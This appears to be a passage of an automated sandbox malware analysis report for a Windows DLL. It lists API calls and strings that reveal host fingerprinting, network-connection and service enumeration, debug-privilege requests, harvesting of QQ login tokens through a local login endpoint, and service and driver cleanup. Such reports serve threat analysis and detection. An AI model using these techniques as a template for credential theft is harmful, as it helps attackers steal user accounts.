                                                          control_flow_graph 187 10014c12-10014c27 RegCloseKey * 2
                                                          APIs
                                                          • RegCloseKey.ADVAPI32(00000000,100149B7), ref: 10014C1C
                                                          • RegCloseKey.ADVAPI32(?), ref: 10014C25
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                          • Instruction ID: cb428774d1c23af65b3502e581b01568c295d1083760601ce9be51a3606d3d50
                                                          • Opcode Fuzzy Hash: 2d25b05425eaf0d76969a3d827c9af328c302ad55e3d4ae73cc7dce2a4c3e829
                                                          • Instruction Fuzzy Hash: 8BB09B759240389BDF54DB64DC449C937687B48200B050586B51CA3150C931AD808F90

                                                          Non-executed Functions

                                                          Function 1000A580 Relevance: 218.3, APIs: 110, Strings: 14, Instructions: 1298memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,00000400), ref: 1000A591
                                                          • LoadLibraryA.KERNEL32 ref: 1000A5A9
                                                          • GetProcAddress.KERNEL32(00000000,AllocateAndGetTcpExTableFromStack), ref: 1000A5C1
                                                          • GetProcAddress.KERNEL32(00000000,AllocateAndGetUdpExTableFromStack), ref: 1000A5CB
                                                          • GetProcAddress.KERNEL32(00000000,InternalGetTcpTable2), ref: 1000A5E7
                                                          • GetProcessHeap.KERNEL32(00000001), ref: 1000A602
                                                          • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000AD8C
                                                          • GetProcessHeap.KERNEL32(00000002,00000002), ref: 1000ADAD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHeapProcProcess$AllocLibraryLoadLocal
                                                          • String ID: %s:%u$*.*.*.*:*$AllocateAndGetTcpExTableFromStack$AllocateAndGetUdpExTableFromStack$CLOSE_WAIT$FIN_WAIT1$FIN_WAIT2$InternalGetTcpTable2$InternalGetUdpTableWithOwnerPid$LAST_ACK$TIME_WAIT$[TCP]$[UDP]$iphlpapi.dll
                                                          • API String ID: 370057222-305753129
                                                          • Opcode ID: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                          • Instruction ID: 3878becebeafeda62e551408519d1494f05c47cd3e4fb1777d1cfee609c89dcd
                                                          • Opcode Fuzzy Hash: 519bc66bccf35325d0b58bf220eed18991c6d328836e432961e0ea9d9299cabc
                                                          • Instruction Fuzzy Hash: 53A2C1766083159FC324CF28CC449ABB7E5FBC9710F554A2DF94A93281DA74ED0ACB92
                                                          Function 1002A260 Relevance: 201.8, APIs: 29, Strings: 86, Instructions: 535registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32 ref: 1002A387
                                                          • RegQueryValueExA.ADVAPI32(?,~MHz,00000000,00000000,?,?), ref: 1002A3B6
                                                          • RegCloseKey.ADVAPI32(?), ref: 1002A3C1
                                                          • GetSystemInfo.KERNEL32(?), ref: 1002A3CF
                                                          • wsprintfA.USER32 ref: 1002A3F8
                                                          • RegOpenKeyExA.ADVAPI32(80000002,00000043,00000000,00000001,?), ref: 1002A551
                                                          • RegQueryValueExA.ADVAPI32(00000001,ProcessorNameString,00000000,?,?,00000043), ref: 1002A59F
                                                          • RegCloseKey.ADVAPI32(?), ref: 1002A5EF
                                                          • GetComputerNameA.KERNEL32(?,secorPlartneC), ref: 1002A645
                                                            • Part of subcall function 1002A180: WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?,?,75A38400,?), ref: 1002A19F
                                                            • Part of subcall function 1002A180: WTSFreeMemory.WTSAPI32(?,00000000,000000FF,00000005,?,?,?,75A38400,?), ref: 1002A1D0
                                                          • GetTickCount.KERNEL32 ref: 1002A65B
                                                          • wsprintfA.USER32 ref: 1002A6AB
                                                          • GetDC.USER32(00000000), ref: 1002A6B2
                                                          • GetDeviceCaps.GDI32(00000000,00000075), ref: 1002A6C3
                                                          • GetDeviceCaps.GDI32(00000000,00000076), ref: 1002A6C9
                                                          • wsprintfA.USER32 ref: 1002A6D9
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 1002A6E1
                                                          • wsprintfA.USER32 ref: 1002A705
                                                          • wsprintfA.USER32 ref: 1002A727
                                                          • wsprintfA.USER32 ref: 1002A740
                                                          • GetCommandLineA.KERNEL32 ref: 1002A745
                                                          • wsprintfA.USER32 ref: 1002A759
                                                          • GetUserNameA.ADVAPI32(?,?), ref: 1002A773
                                                          • wsprintfA.USER32 ref: 1002A807
                                                          • wsprintfA.USER32 ref: 1002A81F
                                                          • FindWindowA.USER32(?,00000000), ref: 1002A869
                                                          • GetWindowTextA.USER32(00000000,?,00000104), ref: 1002A8CA
                                                          • GetWindow.USER32(00000000,00000002), ref: 1002A9AA
                                                          • GetClassNameA.USER32(00000000,?,00000104), ref: 1002A9BC
                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 1002A9DD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wsprintf$NameQueryWindow$CapsCloseDeviceMemoryOpenValue$ClassCommandComputerCountFindFreeGlobalInfoInformationLineReleaseSessionStatusSystemTextTickUser
                                                          • String ID: %d * %d$%d*%dMHz$%s%s%s$0$A$A$A$A$C$C$C$C$CTXOPConntion_Class$D$D$D$D$E$E$E$E$H$H$I$I$I$I$N$N$O$O$P$P$P$P$ProcessorNameString$R$R$R$R$R$R$S$S$S$S$T$T$W$W$a$a$c$c$e$e$e$e$e$e$l$l$m$m$n$n$o$o$o$r$r$r$r$r$s$s$s$s$secorPlartneC$t$t$t$t$y$y$~MHz
                                                          • API String ID: 2087514681-3067132264
                                                          • Opcode ID: 63a6304faa64ff7c01f52f20226e175c82766ba0332dec2d0b30ebfb8e23f1d0
                                                          • Instruction ID: 1800749c8e29be72a86e9a56a49647d81c20680331eb2f52e83484c630fbb443
                                                          • Opcode Fuzzy Hash: 63a6304faa64ff7c01f52f20226e175c82766ba0332dec2d0b30ebfb8e23f1d0
                                                          • Instruction Fuzzy Hash: CD22D23050C7C19EE325C638C844B9BBBD6ABD2304F484A5DF6D947282DBBA9908C767
                                                          Function 10014060 Relevance: 149.4, APIs: 67, Strings: 18, Instructions: 633networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 1001410A
                                                          • InternetConnectA.WININET(00000000,00000000,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 1001413A
                                                          • InternetCloseHandle.WININET(00000000), ref: 1001414B
                                                          Strings
                                                          • Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded, xrefs: 100140CB
                                                          • Set-Cookie: , xrefs: 1001430E, 1001435F
                                                          • GET, xrefs: 10014176, 10014416
                                                          • /cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23, xrefs: 100140B4
                                                          • groups, xrefs: 100146D3
                                                          • , xrefs: 10014100
                                                          • uin, xrefs: 10014658
                                                          • Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s, xrefs: 10014456
                                                          • xui.ptlogin2.qq.com, xrefs: 100140A2
                                                          • friends, xrefs: 100146B1
                                                          • pt_local_tk=, xrefs: 100142B5
                                                          • 0.9475416028552021, xrefs: 100143E7
                                                          • nickname, xrefs: 1001464D
                                                          • HTTP/1.1, xrefs: 10014170, 10014410
                                                          • /pt_get_uins?callback=ptui_getuins_CB&r=%s&%s, xrefs: 100143F3
                                                          • Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1), xrefs: 10014082
                                                          • localhost.ptlogin2.qq.com, xrefs: 100140E0
                                                          • pt_local_token=, xrefs: 10014280
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID: $/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23$/pt_get_uins?callback=ptui_getuins_CB&r=%s&%s$0.9475416028552021$Accept: */*Referer: https://localhost.ptlogin2.qq.com:4301%sAccept-Language: zh-cnContent-Type: application/x-www-form-urlencodedCookie: %s$Accept: */*Referer: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_url=http%3A%2F%2Fqun.qq.com%2Fmember.html%23Accept-Language: zh-cnContent-Type: application/x-www-form-urlencoded$GET$HTTP/1.1$Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)$Set-Cookie: $friends$groups$localhost.ptlogin2.qq.com$nickname$pt_local_tk=$pt_local_token=$uin$xui.ptlogin2.qq.com
                                                          • API String ID: 1463438336-3428588184
                                                          • Opcode ID: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                          • Instruction ID: 10a0a4d67c7a86b0295143d81d79a2071c775b89c22be300c5b0aaeb6ee9b044
                                                          • Opcode Fuzzy Hash: d5fce840208fc55bd6649f1f1c9febec2897434e5a5b3cd0b33532438a929aca
                                                          • Instruction Fuzzy Hash: C20249766047047BE310DA68DC45FEF73D9EBC4720F450A29FA05E7280EF79E90586A6
                                                          Function 1001E020 Relevance: 135.0, APIs: 11, Strings: 66, Instructions: 273sleepsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,771A83C0,1001F1D6), ref: 1001B666
                                                            • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                            • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                          • GetVersionExA.KERNEL32(?), ref: 1001E264
                                                            • Part of subcall function 1001AC50: LoadLibraryW.KERNEL32(ntdll.dll,?,00000000,1001B2AF,?,?,?), ref: 1001AC59
                                                            • Part of subcall function 1001AC50: GetProcAddress.KERNEL32(00000000,RtlGetNtVersionNumbers), ref: 1001AC6B
                                                            • Part of subcall function 1001AC50: FreeLibrary.KERNEL32(00000000), ref: 1001AC95
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001E292
                                                          • sprintf.MSVCRT ref: 1001E2AD
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1001E31B
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001E34D
                                                          • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E377
                                                          • FindWindowA.USER32(#32770,1011F90C), ref: 1001E391
                                                          • Sleep.KERNEL32(0000012C), ref: 1001E3A1
                                                          • FindWindowA.USER32(#32770,GINA Logon), ref: 1001E3AD
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001E414
                                                          • ExitProcess.KERNEL32 ref: 1001E433
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindHandleLibraryWindow$AddressCloseLoadModuleProc$ExitFileFreeNameObjectProcessSingleSleepVersionWaitsprintf
                                                          • String ID: #32770$%s -acsi$-rsvc$-wait$.$.$2$2$3$3$A$A$A$A$C$C$D$E$E$E$GINA Logon$H$I$K$L$P$S$S$V$a$a$a$c$c$d$d$d$i$i$l$l$l$l$l$l$n$n$r$r$r$r$r$r$s$s$t$t$t$t$t$t$u$v$v$v$x
                                                          • API String ID: 2386940797-994141675
                                                          • Opcode ID: 1c84750917d403726ce2df58465706bf03f7e45037251a28afedf40dcb5798ad
                                                          • Instruction ID: ce68f29057c7fa9c6db68528a9d4da9d13cbb2a338243e621745e733c91a4579
                                                          • Opcode Fuzzy Hash: 1c84750917d403726ce2df58465706bf03f7e45037251a28afedf40dcb5798ad
                                                          • Instruction Fuzzy Hash: 31C12C6040C3C49EE311C7788898B8FBFD5ABA6348F58495CF2D44B292D3BAD948C767
                                                          Function 10010190 Relevance: 126.4, APIs: 37, Strings: 35, Instructions: 380servicefilesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • AttachConsole.KERNEL32(?), ref: 100101B3
                                                          • Sleep.KERNEL32(0000000A), ref: 100101BB
                                                          • AttachConsole.KERNEL32(?), ref: 100101C5
                                                          • GetConsoleProcessList.KERNEL32(?,00000001), ref: 100101D8
                                                          • #823.MFC42(00000000), ref: 100101E9
                                                          • GetConsoleProcessList.KERNEL32(00000000,00000000), ref: 100101F9
                                                          • GetCurrentProcessId.KERNEL32 ref: 10010203
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10010217
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 10010226
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001022D
                                                          • #825.MFC42(00000000), ref: 1001023E
                                                          • FreeConsole.KERNEL32 ref: 1001024C
                                                          • Sleep.KERNEL32(0000000A), ref: 10010254
                                                          • FreeConsole.KERNEL32 ref: 1001025A
                                                          • TerminateProcess.KERNEL32(?,00000000), ref: 10010266
                                                          • swprintf.MSVCRT(?,\Registry\Machine\System\CurrentControlSet\Services\%S,1011F4E0,NTDLL.DLL,ZwUnloadDriver,NTDLL.DLL,RtlInitUnicodeString,SeLoadDriverPrivilege,00000001), ref: 10010304
                                                          • SHDeleteKeyA.SHLWAPI(80000002,?), ref: 1001039A
                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 100103A6
                                                          • OpenServiceA.ADVAPI32(00000000,1011EC82,00010000), ref: 100103BD
                                                          • DeleteService.ADVAPI32(00000000), ref: 100103D0
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100103D7
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 100103DA
                                                          • GetSystemDirectoryA.KERNEL32 ref: 1001049F
                                                          • lstrcatA.KERNEL32(?,?), ref: 100104B4
                                                          • DeleteFileA.KERNEL32(?), ref: 100104C4
                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10010509
                                                          • lstrcatA.KERNEL32(?,?), ref: 10010518
                                                          • DeleteFileA.KERNEL32(?), ref: 10010522
                                                          • LocalFree.KERNEL32(?), ref: 1001052A
                                                          • free.MSVCRT ref: 1001053D
                                                          • free.MSVCRT ref: 10010546
                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1001055D
                                                          • GetCurrentProcess.KERNEL32(00000000), ref: 10010568
                                                          • IsWow64Process.KERNEL32(00000000), ref: 1001056F
                                                          • DeleteFileA.KERNEL32(?), ref: 1001060E
                                                          • SetServiceStatus.ADVAPI32(?,1012BB60), ref: 1001062D
                                                          • ExitProcess.KERNEL32 ref: 1001063A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$Console$DeleteService$CloseDirectoryFileFreeHandleOpen$AttachCurrentListSleepSystemTerminatefreelstrcat$#823#825ExitLocalManagerStatusWindowsWow64swprintf
                                                          • String ID: .$.$.sys$Host$MarkTime$NTDLL.DLL$P$RtlInitUnicodeString$SYSTEM\CurrentControlSet\Services\$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\Select$SYSTEM\Setup$SeLoadDriverPrivilege$V$ZwUnloadDriver$\$\$\Registry\Machine\System\CurrentControlSet\Services\%S$\sysnative\drivers\$\system32\drivers\$a$b$d$d$d$e$g$g$m$n$o$o$s$t$u
                                                          • API String ID: 2905031204-766513331
                                                          • Opcode ID: f4407198bf455ab50e06ca1c261f8534e2d499fe0cca06c648f11f18c27eeb47
                                                          • Instruction ID: e3bd07ef3eb6e488717b5f62ba07ac58d2ef718029029a6487bc72f4bfd56139
                                                          • Opcode Fuzzy Hash: f4407198bf455ab50e06ca1c261f8534e2d499fe0cca06c648f11f18c27eeb47
                                                          • Instruction Fuzzy Hash: 74D12235604354ABE310DB78CC84B9B7BD5EB84314F080A1DF689AB2D1DBB4ED44C7A6
                                                          Function 10019930 Relevance: 79.1, APIs: 44, Strings: 1, Instructions: 387stringmemoryserviceCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                            • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                          • LocalAlloc.KERNEL32(00000040,00000104), ref: 10019960
                                                          • OpenSCManagerA.ADVAPI32 ref: 10019977
                                                          • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199A3
                                                          • LocalAlloc.KERNEL32(00000040,?), ref: 100199AC
                                                          • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,?), ref: 100199CE
                                                          • OpenServiceA.ADVAPI32(00000000,?,00000001), ref: 100199F4
                                                          • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,?), ref: 10019A1A
                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A27
                                                          • QueryServiceConfigA.ADVAPI32(00000000,00000000,00000000,00000000), ref: 10019A3B
                                                          • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A55
                                                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 10019A62
                                                          • QueryServiceConfig2A.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 10019A7A
                                                          • lstrcatA.KERNEL32(?,100FBD1C), ref: 10019ADB
                                                          • lstrcatA.KERNEL32(?,100FBD14), ref: 10019B06
                                                          • lstrlenA.KERNEL32(00000040), ref: 10019B1C
                                                          • lstrlenA.KERNEL32(?), ref: 10019B24
                                                          • lstrlenA.KERNEL32 ref: 10019B2F
                                                          • lstrlenA.KERNEL32(?), ref: 10019B3B
                                                          • lstrlenA.KERNEL32(?), ref: 10019B44
                                                          • lstrlenA.KERNEL32(?), ref: 10019B4C
                                                          • LocalSize.KERNEL32(?), ref: 10019B5E
                                                          • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 10019B70
                                                          • lstrlenA.KERNEL32(?), ref: 10019B7E
                                                          • lstrlenA.KERNEL32(?), ref: 10019B88
                                                          • lstrlenA.KERNEL32(?), ref: 10019BB1
                                                          • lstrlenA.KERNEL32(00000000), ref: 10019BC6
                                                          • lstrlenA.KERNEL32 ref: 10019BCF
                                                          • lstrlenA.KERNEL32(00000000), ref: 10019BFA
                                                          • lstrlenA.KERNEL32 ref: 10019C0B
                                                          • lstrlenA.KERNEL32(00000000), ref: 10019C14
                                                          • lstrlenA.KERNEL32(00000001), ref: 10019C3A
                                                          • lstrlenA.KERNEL32(?), ref: 10019C49
                                                          • lstrlenA.KERNEL32(?), ref: 10019C6B
                                                          • lstrlenA.KERNEL32(?), ref: 10019C81
                                                          • lstrlenA.KERNEL32(?), ref: 10019CA9
                                                          • lstrlenA.KERNEL32(?), ref: 10019CBB
                                                          • lstrlenA.KERNEL32(?), ref: 10019CC5
                                                          • lstrlenA.KERNEL32(?), ref: 10019CE9
                                                          • LocalFree.KERNEL32(?), ref: 10019CFE
                                                          • LocalFree.KERNEL32(00000000), ref: 10019D01
                                                          • CloseServiceHandle.ADVAPI32(?), ref: 10019D08
                                                          • LocalFree.KERNEL32(00000000), ref: 10019D3B
                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 10019D42
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10019D50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Local$Service$Alloc$Query$FreeOpen$CloseConfigConfig2EnumHandleProcessServicesStatuslstrcat$CurrentManagerSizeToken
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 19575313-2896544425
                                                          • Opcode ID: 2df178e330b11d1ae48753c649d3bb89eaa4c1e1807dcd0ba63a183abde4b81f
                                                          • Instruction ID: 602a72ac4dd89d5092f96c4d0856d720342e345610072c012a51b9f9dfb16572
                                                          • Opcode Fuzzy Hash: 2df178e330b11d1ae48753c649d3bb89eaa4c1e1807dcd0ba63a183abde4b81f
                                                          • Instruction Fuzzy Hash: 37D12C75204306AFD714DF64CC84AABB7E9FBC8700F54491DFA46A7250DB74E909CBA2
                                                          Function 10001140 Relevance: 68.4, APIs: 22, Strings: 17, Instructions: 161libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,TerminateThread), ref: 1000115F
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10001168
                                                          • LoadLibraryA.KERNEL32 ref: 100011B4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 100011B7
                                                          • LoadLibraryA.KERNEL32(WINMM.dll,waveOutClose), ref: 100011C7
